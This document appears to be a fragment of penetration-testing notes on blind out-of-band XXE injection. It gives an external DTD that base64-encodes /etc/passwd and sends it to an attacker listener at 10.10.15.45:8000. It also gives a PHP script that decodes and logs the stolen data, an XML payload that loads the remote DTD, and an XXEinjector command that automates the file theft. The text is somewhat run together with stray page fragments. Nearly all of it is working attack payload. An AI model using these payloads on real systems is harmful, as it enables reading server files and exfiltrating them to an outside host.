subl xxe.dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://10.10.15.45:8000/?content=%file;'>">
Option 2
First we need to save the request to blind.req
Then just edit the XML content and make sure to put the XXEINJECT
Last updated
# To decode the base64 encoded /etc/passwd
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>/blindruby XXEinjector.rb --host=10.10.15.45 --httpport=8000 --file=../blind.req --path=/etc/passwd --oob=http --phpfilter